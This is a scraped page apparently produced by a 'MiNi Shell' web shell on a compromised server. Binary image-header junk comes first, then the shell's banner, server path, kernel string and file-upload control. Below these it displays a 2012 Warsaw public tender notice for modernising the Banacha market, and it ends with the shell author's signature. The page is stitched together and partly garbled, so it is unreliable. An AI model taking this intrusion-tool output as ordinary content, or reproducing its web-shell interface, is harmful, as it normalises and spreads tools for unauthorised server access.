JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120904/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120904/189507-N-2012.html

<p class="kh_header"><b>Warszawa: Modernizacja Targowiska przy ul. Banacha</b><br>
<b>Numer ogłoszenia: 189507 - 2012; data zamieszczenia: 04.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Mienia m. st. Warszawy, jednostka budżetowa , ul. Jana Kazimierza 62, 01-248 Warszawa, woj. mazowieckie, tel. 0-22 8368103, 8773874, faks 8368061.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zmp.internetdsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa m.st. Warszawy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja Targowiska przy ul. Banacha.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest   kompletne wybudowanie budynku handlowo-usługowego z garażem podziemnym oraz placem targowym  wraz z drogami dojazdowymi, zielenią i zagospodarowaniem terenu oraz przyłączami do sieci infrastruktury  technicznej: wodociągowej, kanalizacyjnej, ciepłowniczej, energetycznej i teletechnicznej. Inwestycja będzie realizowana w Warszawie - dzielnicy Ochota  - przy  ul. Grójeckiej, na działkach o numerach ewidencyjnych  60 i 62/1    z obrębu 2-03-09. 
 
Parametry określające przedmiot zamówienia
  
powierzchnia działek 60, 62/1 - 6614     m2
powierzchnia zabudowy - 3143     m2
powierzchnia utwardzona - drogi, place, parkingi, chodniki itp. - razem 3246 m2
powierzchnia utwardzona na gruncie rodzimym - 371 m2
powierzchnia utwardzona nad kondygnacją -1 - 2875 m2
powierzchnia zieleni - 557 m2
powierzchnia całkowita  (I i II kondygnacja) - 3773 m2
kubatura część nadziemna - 15868 m3
kubatura część podziemna - 9292 m3
powierzchnia biologicznie czynna stanowi 8,4% powierzchni działki
Inwestycja składa się z dwóch podstawowych elementów: hali targowej oraz placu targowego. Hala targowa została zlokalizowana w ostrej granicy działki od strony ul. Grójeckiej. Pod halą targową i częścią placu targowego zaprojektowano jednopoziomowy garaż podziemny z wjazdem od ul W. Skorochód-Majewskiego. Nad częścią hali od strony Grójeckiej zaprojektowano drugą kondygnację, przeznaczoną na handel lub usługi. Do budynku hali przylega  zewnętrzny plac targowy, domknięty z dwóch stron zadaszonymi stanowiskami handlowymi.
Konstrukcja części podziemnej (garażu) zaprojektowana jest jako żelbetowa monolityczna w obudowie wykopu ze ścianki berlińskiej. Konstrukcję części nadziemnej stanowi układ   płytowo-słupowy w technologii żelbetowej.    
Izolacja części podziemnej (garażu): w formie szczelnej wanny w technologii hydroizolacji bezpowłokowej.
Pod płytą placu targowego zaprojektowano, prefabrykowany zbiornik retencyjny. 
Powierzchnia placu oraz ciągów pieszych wykonana  będzie głównie z prasowanych płyt betonowych.  
W budynku przewidziano 2 windy osobowe.
Elewacje budynku zaprojektowano z prefabrykatów betonowych pełnych i ażurowych, przeszklonych ścian osłonowych, paneli z blachy perforowanej i tynku mineralnego. Na dachu hali targowej zaprojektowano świetliki dachowe.
Elementy wykonane z surowego betonu będą traktowane jako ostatecznie wykończone (beton architektoniczny). W hali targowej przewidziano wydzielenie pojedynczych pawilonów (po obwodzie hali) oraz półotwartych stanowisk handlowych (boksów) w części środkowej, zamykanych żaluzjami. 
Poziom drugiej kondygnacji zostanie wybudowany w formie otwartej przestrzeni (open space) do aranżacji przez przyszłych użytkowników.
Teren inwestycji   zlokalizowany jest na miejscu byłego targowiska, w kwartale pomiędzy ulicami Grójecką, Walentego Skorochód-Majewskiego i budynkiem Hali Banacha, w Dzielnicy Ochota m. st. Warszawy.  Przez środek działki przebiegają  istniejące sieci: sieć wodociągowa wB150, ogólnospławna KB600x1100, gazowa gP80.   Przełożenia bądź usunięcia   będą wymagały tylko  istniejąca sieć gazowa i tP.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.31.12-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada wiedzę i doświadczenie w zakresie realizacji robót stanowiących przedmiot zamówienia, tj. zrealizował w okresie ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, jako generalny wykonawca lub podwykonawca co najmniej
a  -  2 zadania obejmujące roboty polegające na wybudowaniu obiektu kubaturowego z garażem podziemnym na co najmniej 30 miejsc postojowych, wyposażonego we wszystkie instalacje teletechniczne i pełną ochronę p.poż; w tym co najmniej jednego z izolacją przeciwwodną garażu podziemnego w formie wanny szczelnej
b  -  1 zadanie obejmujące roboty polegające na wybudowaniu inwestycji kubaturowej z przełożeniem co najmniej jednej sieci miejskiej w ścisłej zabudowie miejskiej o wartości co najmniej 5 mln zł.
Spełnienie ww. warunku Zamawiający oceniał będzie na podstawie załączonego do wniosku o dopuszczenie do udziału w postępowaniu wykazu robót i załączonych dokumentów potwierdzających, że wymienione w nim roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Ocena poziomu spełnienia przez Wykonawcę warunku Wiedza i doświadczenie będzie elementem oceny wniosku, służącej do wyboru grupy wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu. Punkty za spełnianie tego warunku przyznawane będą wg zasady:
Za wykonane zadania w ilości wymaganej przez zamawiającego wykonawca otrzyma 0 pkt. Za każde dodatkowo wykonane zadanie określone w pkt. a (ponad 2 zadania) wykonawca otrzyma 1 pkt. W przypadku uzyskania przez dwóch lub więcej wykonawców tej samej ilości punktów o kolejności rozstrzygać będzie łączna wartość zrealizowanych zadań opisanych w pkt. III.3.2 ppkt. a.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje osobami (co najmniej jedną osobą dla każdej specjalności), które zgodnie z wymogami art. 12 ustawy z 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 ze zm.) mogą pełnić samodzielną funkcję techniczną w budownictwie obejmującą kierowanie robotami budowlanymi w zakresie przedmiotu zamówienia, tj. posiadają uprawnienia budowlane do kierowania robotami budowlanymi w specjalnościach: 
- konstrukcyjno budowlanej bez ograniczeń,
- instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń,
- instalacyjnej w zakresie instalacji i urządzeń wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń.
oraz są członkiem właściwej izby samorządu zawodowego;
Spełnianie ww. warunku oceniane będzie na podstawie przedłożonego we wniosku o dopuszczenie do udziału w postępowaniu stosownego oświadczenia wykonawcy, że co najmniej jedna osoba (dla danej specjalności), która będzie uczestniczyła w wykonywaniu zamówienia, posiada wymagane uprawnienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków - oryginał lub kopia poświadczona notarialnie.
2.Pełnomocnictwo, dla osoby podpisującej wniosek o dopuszczenie do postępowania, do podejmowania zobowiązań w imieniu Wykonawcy (jeżeli reprezentuje go pełnomocnik) oraz pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - oryginał lub kopia poświadczona notarialnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Ocena poziomu spełnienia przez Wykonawcę warunku Wiedza i doświadczenie będzie elementem oceny wniosku, służącej do wyboru grupy wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu. Punkty za spełnianie tego warunku przyznawane będą wg zasady:
Za wykonane zadania w ilości wymaganej przez zamawiającego wykonawca otrzyma 0 pkt. Za każde dodatkowo wykonane zadanie określone w pkt. III.3.2. ppkt. a (ponad 2 zadania) wykonawca otrzyma 1 pkt. W przypadku uzyskania przez dwóch lub więcej wykonawców tej samej ilości punktów o kolejności rozstrzygać będzie łączna wartość zrealizowanych zadań opisanych w pkt. III.3.2 ppkt. a. Waga 100%</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>wprowadzenie zmian do umowy jest dopuszczalne tylko wówczas gdy konieczność ich wprowadzenia będzie następstwem: 1. zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy; 2. zmian stawki urzędowej podatku VAT, przy czym zmianie ulega kwota podatku VAT                i kwota brutto; 3. zmian treści o charakterze informacyjno-instrukcyjnym, niezbędnych dla sprawnej realizacji umowy, w szczególności zmian dotyczących numeru rachunku bankowego Wykonawcy lub Zamawiającego, zmiany osób upoważnionych do kontaktów, zmiany osób odpowiedzialnych za potwierdzenie prawidłowej realizacji zamówienia wraz z numerami telefonu, faksu, adresu poczty elektronicznej; 4. zaistnienia, zdarzeń               o charakterze siły wyższej, niezależnych od stron umowy, które uniemożliwiłyby terminowe wykonanie zobowiązań, Strony zobowiązują się do ustalenia odpowiednio zmienionego terminu wykonania przedmiotu umowy. Za siłę wyższą uważa się zdarzenie zewnętrzne, którego skutków nie da się przewidzieć, ani im zapobiec. W szczególności za siłę wyższą z zachowaniem powyższego będzie się uważać działania sił przyrody takie jak: huragan, trzęsienie ziemi, powódź oraz inne zdarzenia takie jak wojnę, zamieszki, skażenie radioaktywne, zgon lub ciężka choroba któregoś z projektantów. W przypadkach określonych poniżej terminy wykonania danego zadania, zostaje automatycznie przedłużony: 1. w przypadku opóźnienia w zakresie rozpatrywania spraw przez organy administracji publicznej - o okres przekraczający czas rozpatrywania sprawy do wydania prawomocnego rozstrzygnięcia, 2. w przypadku zaskarżenia aktów administracyjnych - od momentu złożenia odwołania, zażalenia, skargi itp. do czasu prawomocnego rozstrzygnięcia przez organy wyższego stopnia, 3. w przypadku opóźnienia Zamawiającego w dostarczeniu Wykonawcy stosownej dokumentacji lub zajęcia stanowiska w sprawach dotyczących realizacji dokumentacji projektowej - przez czas tego opóźnienia,   4. w przypadku wystąpienia siły wyższej - przez okres jej trwania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Mienia m.st. Warszawy, 01-248 Warszawa, ul. Jana Kazimierza 62, pok. 401.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2012 godzina 11:00, miejsce: Zarząd Mienia m.st. Warszawy, 01-248 Warszawa, ul. Jana Kazimierza 62, pok. 401.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Wykonawcy zainteresowani udziałem w postępowaniu składają w siedzibie Zamawiającego wniosek o dopuszczenie do udziału w postępowaniu podpisany przez Wykonawcę - ów. Wniosek powinien być złożony wraz z dokumentami, o których mowa w sekcji III ogłoszenia w nieprzejrzystym, zamkniętym opakowaniu zaadresowanym do Zamawiającego i zawierającym oznaczenie: Wniosek o dopuszczenie do udziału w postępowaniu - Modernizacja Targowiska przy ul. Banacha w Warszawie oraz Nie otwierać przed dniem ........ do godz. ........ oraz zawierającym adres Wykonawcy.
Wniosek o dopuszczenie do udziału w postępowaniu oraz załączniki do wniosku sporządzone przez wykonawcę, muszą być podpisane przez osobę lub osoby uprawnione do występowania w obrocie prawnym w imieniu wykonawcy, zgodnie z zasadami reprezentacji określonymi w dokumencie rejestrowym, bądź osoby upoważnione, posiadające stosowne pełnomocnictwa (w tym przypadku oryginał upoważnienia do podpisania dokumentów lub jego notarialnie potwierdzona za zgodność z oryginałem kopia, musi być dołączony do wniosku). Miejsca naniesienia poprawek w treści wniosku lub załączników muszą być parafowane przez osobę lub osoby upoważnione - uprawnione.Złożenie przez wykonawcę, wraz z wnioskiem, kompletu dokumentów i oświadczeń wymienionych w niniejszym ogłoszeniu, będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu. 
2. Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu i złożenia ofert: 5. Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu, będzie większa niż 5, Zamawiający zaprosi do złożenia ofert Wykonawców, którzy otrzymali najwyższą ocenę punktową spełnienia tych warunków. Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu będzie mniejsza niż 5, Zamawiający zaprosi do złożenia ofert wszystkich Wykonawców spełniających te warunki. 
Ocenie punktowej podlegać będzie doświadczenie Wykonawcy w realizacji zamówień. Za wykonane zadania w ilości wymaganej przez zamawiającego wykonawca otrzyma 0 pkt. Za każde dodatkowo wykonane zadanie określone w pkt. III.3.2.  ppkt. a (ponad 2 zadania) wykonawca otrzyma 1 pkt. W przypadku uzyskania przez dwóch lub więcej wykonawców tej samej ilości punktów o kolejności rozstrzygać będzie łączna wartość zrealizowanych zadań opisanych w pkt. III.3.2 ppkt. a.
W celu zapewnienia uczciwej konkurencji, w przypadku spełnienia ww. warunku Zamawiający nie będzie wzywał w trybie art. 26 ust. 3 do uzupełnienia dokumentów dotyczących wiedzy i doświadczenia ponad wymagane, podlegających ocenie punktowej.
Kolejność wykonawców w zakresie oceny spełniania warunków udziału w postępowaniu i wyłonienia grupy 5 wykonawców, którzy zostaną zaproszeni do złożenia ofert będzie wynikała z łącznej ilości punktów, uzyskanych w wyniku oceny wniosków w zakresie spełniania warunku opisanego w pkt. III.3.2. pkt. a ogłoszenia, zgodnie z zasadami obliczenia ilości punktów, podanymi w opisie sposobu oceny spełniania warunku. W przypadku uzyskania przez dwóch lub więcej wykonawców tej samej ilości punktów o kolejności rozstrzygać będzie łączna wartość zrealizowanych zadań opisanych w pkt. III.3.2 pkt. a wykazanych w Wykazie robót, załączonym do wniosku o dopuszczenie do udziału w postępowaniu.
3. Dopuszcza się możliwość składania jednej oferty przez dwóch lub więcej wykonawców, pod warunkiem, że wykonawcy działający wspólnie ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub do reprezentowania w postępowaniu i do podpisania umowy o zamówienie publiczne w przypadku jego uzyskania. 
Pełnomocnictwo winno określać w szczególności:
- przedmiot postępowania, którego dotyczy,
- wszystkich wykonawców wspólnie ubiegających się o zamówienie,
- pełnomocnika,
- zakres umocowania pełnomocnika.
Pełnomocnictwo musi być podpisane przez wszystkich wykonawców wspólnie ubiegających się o zamówienie wg zasad reprezentacji właściwych dla każdego z wykonawców.
Każdy z wykonawców wspólnie ubiegających się o zamówienie, działających w ramach konsorcjum, spółki cywilnej, oddzielnie musi złożyć dokumenty o których mowa w III.4.2. 
Wszelka korespondencja prowadzona będzie przez zamawiającego wyłącznie z Pełnomocnikiem, którego dane i adres należy wpisać w formularzu oferty lub wskazać w treści oferty.
4. Przed zawarciem umowy Zamawiający może żądać od Wykonawcy, którego oferta została wybrana, w sprawie zamówienia publicznego, umowy regulującej współpracę wykonawców wspólnie ubiegających się o udzielenie zamówienia.
5. Do ewentualnego wykorzystania przez Wykonawców: wzory: wniosku o dopuszczenie do udziału w postępowaniu, oświadczeń oraz wykazów stanowią załączniki do niniejszego ogłoszenia i są dostępne na stronie internetowej Zamawiającego: www.zmp.internetdsl.pl  
6. Na etapie składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia nie przewiduje się udzielania żadnych wyjaśnień i odpowiedzi na zapytania.
7. Specyfikacja Istotnych Warunków Zamówienia nie będzie udostępniana na stronie internetowej Zamawiającego. SIWZ zostanie przekazana Wykonawcom wraz z zaproszeniem do składania ofert.
8. Zamawiający dopuszcza możliwości zmiany umowy zawartej z Wykonawcą. Zmiana umowy jest możliwa jedynie w szczególnie uzasadnionych okolicznościach i na warunkach określonych w SIWZ.
9. Termin wykonania zamówienia może ulec zmianie w okolicznościach i na zasadach określonych w umowie
10. W prowadzonym postępowaniu oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie na adres wskazany w Ogłoszeniu dla punktu kontaktowego lub faksem na nr 22 8368061, lub elektronicznie na adres sekretariat@zmp.internetdsl.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com